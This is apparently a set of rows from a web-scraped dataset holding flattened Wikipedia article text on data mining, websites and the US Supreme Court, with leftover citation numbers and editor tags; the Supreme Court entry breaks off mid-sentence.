212 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore bearing little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 Computer science conferences on data mining include: Data mining topics are also present in many data management database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation which uncovers information or patterns which compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data together (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended according to whom? to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information leading to the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of the consumers. However, the U.S. E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers forcing them to pay unfairly high prices. These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital market places. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). The HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, i n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena, says the AAHC. More importantly, the rule's goal of protection through informed consent is approach a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, this led to the UK government to amend its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020 also Switzerland has been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on the solution to this legal issue, such as licensing rather than limitations and exceptions, led to representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, and other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. For more information about extracting information out of data (as opposed to analyzing data), see: |
213 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Website | A website (also written as a web site) is a collection of web pages and related content that is identified by a common domain name and published on at least one web server. Websites are typically dedicated to a particular topic or purpose, such as news, education, commerce, entertainment, or social media. Hyperlinking between web pages guides the navigation of the site, which often starts with a home page. The most-visited sites are Google, YouTube, and Facebook. All publicly-accessible websites collectively constitute the World Wide Web. There are also private websites that can only be accessed on a private network, such as a company's internal website for its employees. Users can access websites on a range of devices, including desktops, laptops, tablets, and smartphones. The app used on these devices is called a web browser. The World Wide Web (WWW) was created in 1989 by the British CERN computer scientist Tim Berners-Lee. 1 2 On 30 April 1993, CERN announced that the World Wide Web would be free to use for anyone, contributing to the immense growth of the Web. 3 Before the introduction of the Hypertext Transfer Protocol (HTTP), other protocols such as File Transfer Protocol and the gopher protocol were used to retrieve individual files from a server. These protocols offer a simple directory structure in which the user navigates and where they choose files to download. Documents were most often presented as plain text files without formatting or were encoded in word processor formats. While "web site" was the original spelling (sometimes capitalized "Web site", since "Web" is a proper noun when referring to the World Wide Web), this variant has become rarely used, and "website" has become the standard spelling. All major style guides, such as The Chicago Manual of Style 4 and the AP Stylebook, 5 have reflected this change. In February 2009, Netcraft, an Internet monitoring company that has tracked Web growth since 1995, reported that there were 215,675,903 websites with domain names and content on them in 2009, compared to just 19,732 websites in August 1995. 6 After reaching 1 billion websites in September 2014, a milestone confirmed by Netcraft in its October 2014 Web Server Survey and that Internet Live Stats was the first to announce—as attested by this tweet from the inventor of the World Wide Web himself, Tim Berners-Lee—the number of websites in the world have subsequently declined, reverting to a level below 1 billion. This is due to the monthly fluctuations in the count of inactive websites. The number of websites continued growing to over 1 billion by March 2016 and has continued growing since. 7 Netcraft Web Server Survey in January 2020 reported that there are 1,295,973,827 websites and in April 2021 reported that there are 1,212,139,815 sites across 10,939,637 web-facing computers, and 264,469,666 unique domains. 8 An estimated 85 percent of all websites are inactive. 9 A static website is one that has Web pages stored on the server in the format that is sent to a client Web browser. It is primarily coded in Hypertext Markup Language (HTML); Cascading Style Sheets (CSS) are used to control appearance beyond basic HTML. Images are commonly used to create the desired appearance and as part of the main content. Audio or video might also be considered "static" content if it plays automatically or is generally non-interactive. This type of website usually displays the same information to all visitors. Similar to handing out a printed brochure to customers or clients, a static website will generally provide consistent, standard information for an extended period of time. Although the website owner may make updates periodically, it is a manual process to edit the text, photos, and other content and may require basic website design skills and software. Simple forms or marketing examples of websites, such as a classic website, a five-page website or a brochure website are often static websites, because they present pre-defined, static information to the user. This may include information about a company and its products and services through text, photos, animations, audio video, and navigation menus. Static websites may still use server side includes (SSI) as an editing convenience, such as sharing a common menu bar across many pages. As the site's behavior to the reader is still static, this is not considered a dynamic site. A dynamic website is one that changes or customizes itself frequently and automatically. Server-side dynamic pages are generated "on the fly" by computer code that produces the HTML (CSS are responsible for appearance and thus, are static files). There are a wide range of software systems, such as CGI, Java Servlets and Java Server Pages (JSP), Active Server Pages and ColdFusion (CFML) that are available to generate dynamic Web systems and dynamic sites. Various Web application frameworks and Web template systems are available for general-use programming languages like Perl, PHP, Python and Ruby to make it faster and easier to create complex dynamic websites. A site can display the current state of a dialogue between users, monitor a changing situation, or provide information in some way personalized to the requirements of the individual user. For example, when the front page of a news site is requested, the code running on the webserver might combine stored HTML fragments with news stories retrieved from a database or another website via RSS to produce a page that includes the latest information. Dynamic sites can be interactive by using HTML forms, storing and reading back browser cookies, or by creating a series of pages that reflect the previous history of clicks. Another example of dynamic content is when a retail website with a database of media products allows a user to input a search request, e.g. for the keyword Beatles. In response, the content of the Web page will spontaneously change the way it looked before, and will then display a list of Beatles products like CDs, DVDs, and books. Dynamic HTML uses JavaScript code to instruct the Web browser how to interactively modify the page contents. One way to simulate a certain type of dynamic website while avoiding the performance loss of initiating the dynamic engine on a per-user or per-connection basis is to periodically automatically regenerate a large series of static pages. Early websites had only text, and soon after, images. Web browser plug-ins were then used to add audio, video, and interactivity (such as for a rich Web application that mirrors the complexity of a desktop application like a word processor). Examples of such plug-ins are Microsoft Silverlight, Adobe Flash Player, Adobe Shockwave Player, and Java SE. HTML 5 includes provisions for audio and video without plugins. JavaScript is also built into most modern web browsers, and allows for website creators to send code to the web browser that instructs it how to interactively modify page content and communicate with the web server if needed. The browser's internal representation of the content is known as the Document Object Model (DOM). WebGL (Web Graphics Library) is a modern JavaScript API for rendering interactive 3D graphics without the use of plug-ins. It allows interactive content such as 3D animations, visualizations and video explainers to presented users in the most intuitive way. 10 A 2010 era trend in websites called "responsive design" has given the best viewing experience as it provides a device-based layout for users. These websites change their layout according to the device or mobile platform, thus giving a rich user experience. 11 Websites can be divided into two broad categories—static and interactive. Interactive sites are part of the Web 2.0 community of sites and allow for interactivity between the site owner and site visitors or users. Static sites serve or capture information but do not allow engagement with the audience or users directly. Some websites are informational or produced by enthusiasts or for personal use or entertainment. Many websites do aim to make money using one or more business models, including: |
214 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/United_States_Supreme_Court | The Supreme Court of the United States (SCOTUS) is the highest court in the federal judiciary of the United States. It has ultimate appellate jurisdiction over all U.S. federal court cases, and over state court cases that turn on questions of U.S. constitutional or federal law. It also has original jurisdiction over a narrow range of cases, specifically "all Cases affecting Ambassadors, other public Ministers and Consuls, and those in which a State shall be Party. 2 The court holds the power of judicial review: the ability to invalidate a statute for violating a provision of the Constitution. It is also able to strike down presidential directives for violating either the Constitution or statutory law. 3 Established by Article Three of the United States Constitution, the composition and procedures of the Supreme Court were originally established by the 1st Congress through the Judiciary Act of 1789. The court consists of nine justices: the chief justice of the United States and eight associate justices, and the justices meet at the Supreme Court Building in Washington, D.C. Justices have lifetime tenure, meaning they remain on the court until they die, retire, resign, or are impeached and removed from office. 3 When a vacancy occurs, the president, with the advice and consent of the Senate, appoints a new justice. Each justice has a single vote in deciding the cases argued before the court. When in the majority, the chief justice decides who writes the opinion of the court; otherwise, the most senior justice in the majority assigns the task of writing the opinion. The Supreme Court receives on average about 7,000 petitions for writs of certiorari each year, but grants only about 80. 4 better source needed needs update It was while debating the separation of powers between the legislative and executive departments that delegates to the 1787 Constitutional Convention established the parameters for the national judiciary. Creating a "third branch" of government was a novel idea citation needed ; in the English tradition, judicial matters had been treated as an aspect of royal (executive) authority. Early on, the delegates who were opposed to having a strong central government argued that national laws could be enforced by state courts, while others, including James Madison, advocated for a national judicial authority consisting of tribunals chosen by the national legislature. It was proposed that the judiciary should have a role in checking the executive's power to veto or revise laws. citation needed Eventually, the framers compromised by sketching only a general outline of the judiciary in Article Three of the United States Constitution, vesting federal judicial power in "one supreme Court, and in such inferior Courts as the Congress may from time to time ordain and establish. 5 6 better source needed They delineated neither the exact powers and prerogatives of the Supreme Court nor the organization of the judicial branch as a whole. citation needed The 1st United States Congress provided the detailed organization of a federal judiciary through the Judiciary Act of 1789. The Supreme Court, the country's highest judicial tribunal, was to sit in the nation's capital and would initially be composed of a chief justice and five associate justices. The act also divided the country into judicial districts, which were in turn organized into circuits. Justices were required to "ride circuit" and hold circuit court twice a year in their assigned judicial district. 7 non-primary source needed Immediately after signing the act into law, President George Washington nominated the following people to serve on the court: John Jay for chief justice and John Rutledge, William Cushing, Robert H. Harrison, James Wilson, and John Blair Jr. as associate justices. All six were confirmed by the Senate on September 26, 1789; however, Harrison declined to serve, and Washington later nominated James Iredell in his place. 8 non-primary source needed The Supreme Court held its inaugural session from February 2 through February 10, 1790, at the Royal Exchange in New York City, then the U.S. capital. 9 A second session was held there in August 1790. 10 The earliest sessions of the court were devoted to organizational proceedings, as the first cases did not reach it until 1791. 7 When the nation's capital was moved to Philadelphia in 1790, the Supreme Court did so as well. After initially meeting at Independence Hall, the court established its chambers at City Hall. 11 Under chief justices Jay, Rutledge, and Ellsworth (1789 1801), the court heard few cases; its first decision was West v. Barnes (1791), a case involving procedure. 12 As the court initially had only six members, every decision that it made by a majority was also made by two-thirds (voting four to two). 13 However, Congress has always allowed less than the court's full membership to make decisions, starting with a quorum of four justices in 1789. 14 The court lacked a home of its own and had little prestige, 15 a situation not helped by the era's highest-profile case, Chisholm v. Georgia (1793), which was reversed within two years by the adoption of the Eleventh Amendment. 16 The court's power and prestige grew substantially during the Marshall Court (1801 1835). 17 Under Marshall, the court established the power of judicial review over acts of Congress, 18 including specifying itself as the supreme expositor of the Constitution (Marbury v. Madison) 19 20 and making several important constitutional rulings that gave shape and substance to the balance of power between the federal government and states, notably Martin v. Hunter's Lessee, McCulloch v. Maryland, and Gibbons v. Ogden. 21 22 23 24 The Marshall Court also ended the practice of each justice issuing his opinion seriatim, 25 a remnant of British tradition, 26 and instead issuing a single majority opinion. 25 Also during Marshall's tenure, although beyond the court's control, the impeachment and acquittal of Justice Samuel Chase from 1804 to 1805 helped cement the principle of judicial independence. 27 28 The Taney Court (1836 1864) made several important rulings, such as Sheldon v. Sill, which held that while Congress may not limit the subjects the Supreme Court may hear, it may limit the jurisdiction of the lower federal courts to prevent them from hearing cases dealing with certain subjects. 29 Nevertheless, it is primarily remembered for its ruling in Dred Scott v. Sandford, 30 which helped precipitate the American Civil War. 31 In the Reconstruction era, the Chase, Waite, and Fuller Courts (1864 1910) interpreted the new Civil War amendments to the Constitution 24 and developed the doctrine of substantive due process (Lochner v. New York; 32 Adair v. United States). 33 The size of the court was last changed in 1869, when it was set at nine. Under the White and Taft Courts (1910 1930), the court held that the Fourteenth Amendment had incorporated some guarantees of the Bill of Rights against the states (Gitlow v. New York), 34 grappled with the new antitrust statutes (Standard Oil Co. of New Jersey v. United States), upheld the constitutionality of military conscription (Selective Draft Law Cases), 35 and brought the substantive due process doctrine to its first apogee (Adkins v. Children's Hospital). 36 During the Hughes, Stone, and Vinson courts (1930 1953), the court gained its own accommodation in 1935 37 and changed its interpretation of the Constitution, giving a broader reading to the powers of the federal government to facilitate President Franklin D. Roosevelt's New Deal (most prominently West Coast Hotel Co. v. Parrish, Wickard v. Filburn, United States v. Darby, and United States v. Butler). 38 39 40 During World War II, the court continued to favor government power, upholding the internment of Japanese Americans (Korematsu v. United States) and the mandatory Pledge of Allegiance (Minersville School District v. Gobitis). Nevertheless, Gobitis was soon repudiated (West Virginia State Board of Education v. Barnette), and the Steel Seizure Case restricted the pro-government trend. The Warren Court (1953 1969) dramatically expanded the force of Constitutional civil liberties. 41 It held that segregation in public schools violates the Equal Protection Clause of the Fourteenth Amendment (Brown v. Board of Education, Bolling v. Sharpe, and Green v. County School Bd.) 42 and that legislative districts must be roughly equal in population (Reynolds v. Sims). It recognized a general right to privacy (Griswold v. Connecticut), 43 limited the role of religion in public school, most prominently Engel v. Vitale and Abington School District v. Schempp, 44 45 incorporated most guarantees of the Bill of Rights against the states, prominently Mapp v. Ohio (the exclusionary rule) and Gideon v. Wainwright (right to appointed counsel), 46 47 and required that criminal suspects be apprised of all these rights by police (Miranda v. Arizona). 48 At the same time, the court limited defamation suits by public figures (New York Times Co. v. Sullivan) and supplied the government with an unbroken run of antitrust victories. 49 The Burger Court (1969 1986) saw a conservative shift. 50 It also expanded Griswold's right to privacy to strike down abortion laws (Roe v. Wade) 51 but divided deeply on affirmative action (Regents of the University of California v. Bakke) 52 and campaign finance regulation (Buckley v. Valeo). 53 It also wavered on the death penalty, ruling first that most applications were defective (Furman v. Georgia), 54 but later that the death penalty itself was not unconstitutional (Gregg v. Georgia). 54 55 56 The Rehnquist Court (1986 2005) was known for its revival of judicial enforcement of federalism, 57 emphasizing the limits of the Constitution's affirmative grants of power (United States v. Lopez) and the force of its restrictions on those powers (Seminole Tribe v. Florida, City of Boerne v. Flores). 58 59 60 61 62 It struck down single-sex state schools as a violation of equal protection (United States v. Virginia), laws against sodomy as violations of substantive due process (Lawrence v. Texas) 63 and the line-item veto (Clinton v. New York) but upheld school vouchers (Zelman v. Simmons-Harris) and reaffirmed Roe's restrictions on abortion laws (Planned Parenthood v. Casey). 64 The court's decision in Bush v. Gore, which ended the electoral recount during the 2000 United States presidential election, remains especially controversial with debate ongoing over the rightful winner and whether or not the ruling should set a precedent. 65 66 67 68 The Roberts Court (2005 present) is regarded as more conservative and controversial than the Rehnquist Court. 69 70 71 72 Some of its major rulings have concerned federal preemption (Wyeth v. Levine), civil procedure (Twombly Iqbal), voting rights and federal preclearance (Shelby County), abortion (Gonzales v. Carhart and Dobbs v. Jackson Women's Health Organization), 73 climate change (Massachusetts v. EPA), same-sex marriage (United States v. Windsor and Obergefell v. Hodges), and the Bill of Rights, such as in Citizens United v. Federal Election Commission (First Amendment), 74 Heller McDonald Bruen (Second Amendment), 75 and Baze v. Rees (Eighth Amendment). 76 77 Article II, Section 2, Clause 2 of the United States Constitution, known as the Appointments Clause, empowers the president to nominate and, with the confirmation (advice and consent) of the United States Senate, to appoint public officials, including justices of the Supreme Court. This clause is one example of the system of checks and balances inherent in the Constitution. The president has the plenary power to nominate, while the Senate possesses the plenary power to reject or confirm the nominee. The Constitution sets no qualifications for service as a justice, such as age, citizenship, residence or prior judicial experience, thus a president may nominate anyone to serve, and the Senate may not set any qualifications or otherwise limit who the president can choose. 78 79 80 In modern times, the confirmation process has attracted considerable attention from the press and advocacy groups, which lobby senators to confirm or to reject a nominee depending on whether their track record aligns with the group's views. The Senate Judiciary Committee conducts hearings and votes on whether the nomination should go to the full Senate with a positive, negative or neutral report. The committee's practice of personally interviewing nominees is relatively recent. The first nominee to appear before the committee was Harlan Fiske Stone in 1925, who sought to quell concerns about his links to Wall Street, and the modern practice of questioning began with John Marshall Harlan II in 1955. 81 Once the committee reports out the nomination, the full Senate considers it. Rejections are relatively uncommon; the Senate has explicitly rejected twelve Supreme Court nominees, most recently Robert Bork, nominated by President Ronald Reagan in 1987. Although Senate rules do not necessarily allow a negative or tied vote in committee to block a nomination, prior to 2017 a nomination could be blocked by filibuster once debate had begun in the full Senate. President Lyndon B. Johnson's nomination of sitting associate justice Abe Fortas to succeed Earl Warren as Chief Justice in 1968 was the first successful filibuster of a Supreme Court nominee. It included both Republican and Democratic senators concerned with Fortas's ethics. President Donald Trump's nomination of Neil Gorsuch to the seat left vacant by Antonin Scalia's death was the second. Unlike the Fortas filibuster, only Democratic senators voted against cloture on the Gorsuch nomination, citing his perceived conservative judicial philosophy, and the Republican majority's prior refusal to take up President Barack Obama's nomination of Merrick Garland to fill the vacancy. 82 This led the Republican majority to change the rules and eliminate the filibuster for Supreme Court nominations. 83 Not every Supreme Court nominee has received a floor vote in the Senate. A president may withdraw a nomination before an actual confirmation vote occurs, typically because it is clear that the Senate will reject the nominee; this occurred with President George W. Bush's nomination of Harriet Miers in 2005. The Senate may also fail to act on a nomination, which expires at the end of the session. President Dwight Eisenhower's first nomination of John Marshall Harlan II in November 1954 was not acted on by the Senate; Eisenhower re-nominated Harlan in January 1955, and Harlan was confirmed two months later. Most recently, the Senate failed to act on the March 2016 nomination of Merrick Garland, as the nomination expired in January 2017, and the vacancy was filled by Neil Gorsuch, an appointee of President Trump. 84 Once the Senate confirms a nomination, the president must prepare and sign a commission, to which the Seal of the Department of Justice must be affixed, before the appointee can take office. 85 The seniority of an associate justice is based on the commissioning date, not the confirmation or swearing-in date. 86 After receiving their commission, the appointee must then take the two prescribed oaths before assuming their official duties. 87 The importance of the oath taking is underscored by the case of Edwin M. Stanton. Although confirmed by the Senate on December 20, 1869, and duly commissioned as an associate justice by President Ulysses S. Grant, Stanton died on December 24, prior to taking the prescribed oaths. He is not, therefore, considered to have been a member of the court. 88 89 Before 1981, the approval process of justices was usually rapid. From the Truman through Nixon administrations, justices were typically approved within one month. From the Reagan administration to the present, the process has taken much longer and some believe this is because Congress sees justices as playing a more political role than in the past. 90 According to the Congressional Research Service, the average number of days from nomination to final Senate vote since 1975 is 67 days (2.2 months), while the median is 71 days (2.3 months). 91 92 When the Senate is in recess, a president may make temporary appointments to fill vacancies. Recess appointees hold office only until the end of the next Senate session (less than two years). The Senate must confirm the nominee for them to continue serving; of the two chief justices and eleven associate justices who have received recess appointments, only Chief Justice John Rutledge was not subsequently confirmed. 93 No U.S. president since Dwight D. Eisenhower has made a recess appointment to the court, and the practice has become rare and controversial even in lower federal courts. 94 In 1960, after Eisenhower had made three such appointments, the Senate passed a "sense of the Senate" resolution that recess appointments to the court should only be made in "unusual circumstances"; 95 such resolutions are not legally binding but are an expression of Congress's views in the hope of guiding executive action. 95 96 The Supreme Court's 2014 decision in National Labor Relations Board v. Noel Canning limited the ability of the president to make recess appointments (including appointments to the Supreme Court); the court ruled that the Senate decides when the Senate is in session or in recess. Writing for the court, Justice Breyer stated, "We hold that, for purposes of the Recess Appointments Clause, the Senate is in session when it says it is, provided that, under its own rules, it retains the capacity to transact Senate business. 97 This ruling allows the Senate to prevent recess appointments through the use of pro-forma sessions. 98 Lifetime tenure of justices can only be found for US Supreme Court Justices and the State of Rhode Island's Supreme Court justices, with all other democratic nations and all other US states having set term limits or mandatory retirement ages. 99 Larry Sabato wrote: "The insularity of lifetime tenure, combined with the appointments of relatively young attorneys who give long service on the bench, produces senior judges representing the views of past generations better than views of the current day. 100 Sanford Levinson has been critical of justices who stayed in office despite medical deterioration based on longevity. 101 James MacGregor Burns stated lifelong tenure has "produced a critical time lag, with the Supreme Court institutionally almost always behind the times. 102 Proposals to solve these problems include term limits for justices, as proposed by Levinson 103 and Sabato 100 104 and a mandatory retirement age proposed by Richard Epstein, 105 among others. 106 Alexander Hamilton in Federalist 78 argued that one benefit of lifetime tenure was that, "nothing can contribute so much to its firmness and independence as permanency in office. 107 non-primary source needed Article Three, Section 1 of the Constitution provides that justices "shall hold their offices during good behavior", which is understood to mean that they may serve for the remainder of their lives, until death; furthermore, the phrase is generally interpreted to mean that the only way justices can be removed from office is by Congress via the impeachment process. The Framers of the Constitution chose good behavior tenure to limit the power to remove justices and to ensure judicial independence. 108 109 110 No constitutional mechanism exists for removing a justice who is permanently incapacitated by illness or injury, but unable (or unwilling) to resign. 111 The only justice ever to be impeached was Samuel Chase, in 1804. The House of Representatives adopted eight articles of impeachment against him; however, he was acquitted by the Senate, and remained in office until his death in 1811. 112 Two justices, William O. Douglas and Abe Fortas were subjected to hearings from the Judiciary Committee, with Douglas being the subject of hearings twice, in 1953 and again in 1970 and Fortas resigned while hearings were being organized in 1969. On July 10, 2024, Representative Alexandria Ocasia-Cortez filed Articles of Impeachment against justices Clarence Thomas and Samuel Alito, citing their "widely documented financial and personal entanglements. 113 Because justices have indefinite tenure, timing of vacancies can be unpredictable. Sometimes they arise in quick succession, as in September 1971, when Hugo Black and John Marshall Harlan II left within days of each other, the shortest period of time between vacancies in the court's history. 114 Sometimes a great length of time passes between vacancies, such as the 11 year span, from 1994 to 2005, from the retirement of Harry Blackmun to the death of William Rehnquist, which was the second longest timespan between vacancies in the court's history. 115 On average a new justice joins the court about every two years. 116 Despite the variability, all but four presidents have been able to appoint at least one justice. William Henry Harrison died a month after taking office, although his successor (John Tyler) made an appointment during that presidential term. Likewise, Zachary Taylor died 16 months after taking office, but his successor (Millard Fillmore) also made a Supreme Court nomination before the end of that term. Andrew Johnson, who became president after the assassination of Abraham Lincoln, was denied the opportunity to appoint a justice by a reduction in the size of the court. Jimmy Carter is the only person elected president to have left office after at least one full term without having the opportunity to appoint a justice. Presidents James Monroe, Franklin D. Roosevelt, and George W. Bush each served a full term without an opportunity to appoint a justice, but made appointments during their subsequent terms in office. No president who has served more than one full term has gone without at least one opportunity to make an appointment. One of the smallest 